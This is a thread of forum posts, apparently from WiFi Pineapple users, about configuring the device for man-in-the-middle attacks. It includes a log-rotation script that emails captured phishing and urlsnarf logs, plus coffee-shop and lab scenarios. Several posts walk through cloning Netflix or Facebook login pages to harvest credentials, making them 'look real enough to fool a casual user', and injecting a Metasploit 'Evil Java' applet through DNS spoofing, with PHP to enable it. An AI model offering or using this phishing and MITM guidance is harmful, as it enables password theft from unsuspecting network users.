RebelCork

Just wondering if anyone did any April's Fool Pranks with their pineapple today? I kept redirecting all clients to Daily Mail Thinking of a certain goat** but wanted my wife to continue talking to me :0

That looks about as legit as this : ;)

I was thinking this too last week, i had so many problems doing my testing. May I suggest an 'Auto WLAN Restart' Feature, if we are working via wifi, as if I turn off WLAN0 to restart site survey, I obviously cannot log back into the pineapple. The only thing I could do to get it back on was via setting up a button to turn it on (in the beta 1.1 firmware, button module )

It's adding a new file, it is basically moving & renaming each log to log.1, log.2 etc. My own aim is to have the logs emailed to me every couple of hours. I might tweak the above script with the 'logrotate' command from the opkg packages, as I see it also supports emailing logfiles. I don't want to add everything to one file, just in case there is an interuption in power when I am writing Agin, it's a work in progress, so, please any suggestions are more than welcome

I was thinking of logrotate, but I wanted to keep something simple and able to run when I choose, not just daily, weekly etc, as some of my log files will get large fairly quickly. I may alter the script to run and email each log-file once it's saved. Thanks for the feedback, I'm honoured !

Hi all, Please find below my attempt at a quick script for rotating the logfiles created by the pineapple. I am using ssmtp to email the logfiles back to me after 13 rotations ( Feel free to customise) I also added a cron job to run the script every 30 mins It's very rough, please feel free to add your suggestions, I'm not a coder, this is my first script for the pineapple. It's not the best script ever, but it is doing the job so far for me (tested on MKIV running 1.10 beta) It basically creates a folder on the usb drive called rotatelogs It scans the /www/pineapple folder for any log files and moves them to the rotatelogs folder on the usb drive. The user can also decide the rotation schedule (in days) for each individual file. rotatelogs.conf (I stored this in /www/pineapple/rotate) # Configuration file for the rotate log script. # Format is name=duration where 'name' can be any # filename that appears in the /www/pineapple directory # Duration is measured in days # # 30 mins = 0.020833333 day (0.2) # 60 mins = 0.04 etc phish.log=0.02 urlsnarf.log=0.04 # Anything with a duration of zero is not rotated # i.e phish.log=0 rotatelogs.sh #!/bin/sh # rotatelogs - Rolls logfiles in /www/pineapple to /www/backuplogs for archival purposes # uses a config file to allow customisation of how frequently # each log should be backed up to the folder # the config file is in logfilename=duration format # where duration is in days # if the logfile is not in the config file, the file will be backed up weekly mkdir /usb/rotatelogs logdir="/usb/rotatelogs" config="/www/pineapple/rotate/rotatelogs.conf" mv="/bin/mv" default_duration=0.04 count=0 duration=$default_duration if [ ! -f $config ] ; then echo "$0: no config file found. Can't proceed." >&2; exit 1 fi if [ ! -w $logdir -o ! -x $logdir ] ; then echo "$0: You don't have the required permissions in $logdir" >&2; exit 1 fi cd $logdir # This is the meat of the program for name in $(find /www/pineapple/*.log) do count=$(( $count + 1 )) # grabbing this entry from the config file duration="$(grep "^${name}=" $config|cut -d= -f2)" if [ -z $duration ] ; then duration=$default_duration elif [ "$duration" = "0" ] ; then echo "Duration set to zero; Skipping $name" continue fi # I have inputed 13 log files, one per hour back1="${name}.1"; back2="${name}.2"; back3="${name}.3"; back4="${name}.4"; back5="${name}.5"; back6="${name}.6"; back7="${name}.7"; back8="${name}.8"; back9="${name}.9"; back10="${name}.10"; back11="${name}.11"; back12="${name}.12"; back13="${name}.13"; # if the most recently rolled log file (back1) has been modified within the # the specific timeframe, then it wont be rotated. if [ -f "$back1" ] ; then if [ -z $(find "$back1" -mtime +$duration -print 2>/dev/null) ] then echo -n "$name's most recent backup is more recent than $duration " echo "days: Skipping"; continue fi fi echo "Rotating log $name (using a $duration day schedule)" # Rotating logfiles here, starting with the oldest first # After 13 steps, the logs will be emailed. # Change user@domain.com to your ssmtp settings if [ -f "$back1" ] ; then ssmtp -v user@domain.com < "$back1" fi if [ -f "$back12" ] ; then echo "... $back12 -> $back13" ; $mv -f "$back12" "$back13" fi if [ -f "$back11" ] ; then echo "... $back11 -> $back12" ; $mv -f "$back11" "$back12" fi if [ -f "$back10" ] ; then echo "... $back10 -> $back11" ; $mv -f "$back10" "$back11" fi if [ -f "$back9" ] ; then echo "... $back9 -> $back10" ; $mv -f "$back9" "$back10" fi if [ -f "$back8" ] ; then echo "... $back8 -> $back9" ; $mv -f "$back8" "$back9" fi if [ -f "$back7" ] ; then echo "... $back7 -> $back8" ; $mv -f "$back7" "$back8" fi if [ -f "$back6" ] ; then echo "... $back6 -> $back7" ; $mv -f "$back6" "$back7" fi if [ -f "$back5" ] ; then echo "... $back5 -> $back6" ; $mv -f "$back5" "$back6" fi if [ -f "$back4" ] ; then echo "... $back4 -> $back5" ; $mv -f "$back4" "$back5" fi if [ -f "$back3" ] ; then echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4" fi if [ -f "$back2" ] ; then echo "... $back2 -> $back3" ; $mv -f "$back2" "$back3" fi if [ -f "$back1" ] ; then echo "... $back1 -> $back2" ; $mv -f "$back1" "$back2" fi if [ -f "$name" ] ; then echo "... $name -> $back1" ; $mv -f "$name" "$back1" fi touch "$name" chmod 0700 "$name" done if [ $count -eq 0 ] ; then echo "Nothing to do: No log files big enough or old enough to rotate" fi exit 0

Can't yous just set up iptables to block any unwanted traffic. The 'victim' won't be too affected, as if he is trying to access something in a coffee shop scenario, these things will likely to be blocked. Have ip tables point to a 404 error for this kind of 'bad' traffic. Remember, you are the MITM, you are the ISP. :) Running urlsnarf, you will see what type of sites to block and write a rule for it. It may take a little bit of trial and error, but hell, that's how we learn.

Without the 3g dongle, I have been getting around 16 hours.( On for 3 or 4 hours a day) I have left it on all day at home, but there wasn't much activity. I'm sure as the more clients connect, the battery will decrease due to increased load. That's next on my list to test, but I know the battery won't die after only 1 or 2 hours in the wild!

Send them to free up space. I was thinking of sending them into tcpdump/snort to see packets and initiate logs. I love the idea of being able to get an hourly report for example, and see what kind of data has gone through. It'll be my Easter project to get some sort of automated sniffer going, and hell maybe fit that into a module (even a basic one)

I am asking a genuine question. I was thinking something similar, using a cron job to rotate the logs and email them at regular intervals, ie, have 13 rotating logfiles, each rotating at 5 min intervals, and the sendmail sending out every hour. My other option would have been a netcat type I wanted to do that instead of leaving it on the usb card I havent used linux since i was in university! Give a 'newbie' some credit, I'm only thinking out loud ! :)

How big ar the logs?

Remember, once you start cloning your chosen sites. Input your own code snippets/design your own login area (username & password fields) You just have to make it look real enough to fool a casual user. One of the points about MITM attacks is that we feel secure and trusting of our ISP, especially when it looks like we are connected to our own network. So long as the login page is simple and lookslegit to the end user, they will easily enter creds Just my opinion ! :)

I agree. Best way is to set up a VM machine purely to be the 'victim' of your attack on a local network.(I have seperate wifi connection, only for testing) Then scale from there. A lot of the attacks in SET are targeted at machines with older OS's. Learn to play with Metasploit, starting with Armitage to see different attacks and how to write your own (easy). Then, you can perform tests over the internet as your confidence grows.

I also use sshfs for Mac OSX This is the best way to install it: cd ~/Downloads ## Download the latest version (as found on fuse4x.org) and install wget https://github.com/downloads/fuse4x/fuse4x/Fuse4X-0.8.7.pkg open Fuse4X-0.8.7.pkg ## Get the latest version of SSHFS (as found on github.com/fuse4x/fuse4x/downloads) wget https://github.com/downloads/fuse4x/fuse4x/sshfs-2.3.0.zip ## Install sshfs binary to /usr/local/bin/sshfs (and install man page): unzip sshfs-2.3.0.zip -d / Hope it helps Source: Here

Change it to a button that you can control so (point to error.php). The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need. With php/html, you can't do any damage, so play around and have fun!

+1 Perfect for espresso. I can tweak php files on the go now, thanks!

I don't think you can add a wireless card at the moment.

Looking at the source files for Netflix, The actual login.php page is not on the home page. Why dont you try the following? Clone/Copy the standard front page of netflix and the login.php page to your MKIV Find the link to login.php and change it your desired location In the login.php from the website, and change the action method as suggested in the tutorials. Should work ! Try this and play around. Extra bonus points for learning basic html and php ! B)

DNS Spoof is running and you have the run.html offering up a java attack applet.It will run constantly, you can't turn it off without replacing the redirected page. If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page. For example, clone www.facebook.com and insert the code into the webpage. That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen. Also a particulairly nasty attack would be to disguise the attack vector as one of the many popular FB games. With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well. These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks)

I think ngrep and urlsnarf aren't 100% functional on MKIV. (Sebkinne says: ngrep is not installed currently) (Thought so: :) ) I thinks it's in the list of to fix for next release of firmware, if i'm right. see this thread: MKIV - What we know and don't know

The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded. Instead you can backup your existing index.php file in the pineapple folder before making any changes: cp index.php index.bak Open the one from the package above (MKIII) , copy the following code and paste it into the php segment of your MKIV index.php file $isjavaup = exec("cat up"); if ($isjavaup != "") { echo "Evil Java is currently <font color=\"lime\"><b>enabled</b></font>. | <a href=\"stopjava.php\"><b>Stop</b></a><br />"; } else { echo "Evil Java is currently <font color=\"red\"><b>disabled</b></font>. | <a href=\"startjava.php\"><b>Start</b></a> | <a href=\"conf.php\"><b>Conf</b></a><br/>"; } Reboot your pineapple, and you should see the Evil Java option. Change your landing page to redirect to /java/run.html So far on my tests, this has worked for me, with access to metasploit working. The only thing is, the switch status (on/off) does not work I hope that helps, but I'm a metasploit newbie myself!

Noob question (sorry!) Which monitor interface does it use, as there is the wlan.mon0 monitor interface, but isn't that used for karma. Does this also break karma, as when I try it, I can't get an AP ? I'm running 1.02, MKIV. BTW, I've tweaked my navbar.php to include site_survey.php as a menu option. Thanks again **Edit ** killuminati just beat me to it :) **Edit** I've just answered my own question I just restarted wlan0 and I could perform deauths and still have karma running.

Unfortunately the wifipineapple.com site is down. Sebkinne is in the process of transferring it to github. :)

Thanks ! Been looking for this (and annoying many, many other posters!). I have done a quick edit and added the link to the file on the wiki for any other noobs such as myself!

Have been using this with a USB cable like Splicer recommends above passing through my USB port on my Mac/ TeckNet iEP390 Battery Pack (11000mAh). Havent tried it with a 3G dongle as yet, but I think there might not be enough draw from one USB port. Perhaps someone should source one of those dual USB to single power port power cable, giving 10v power??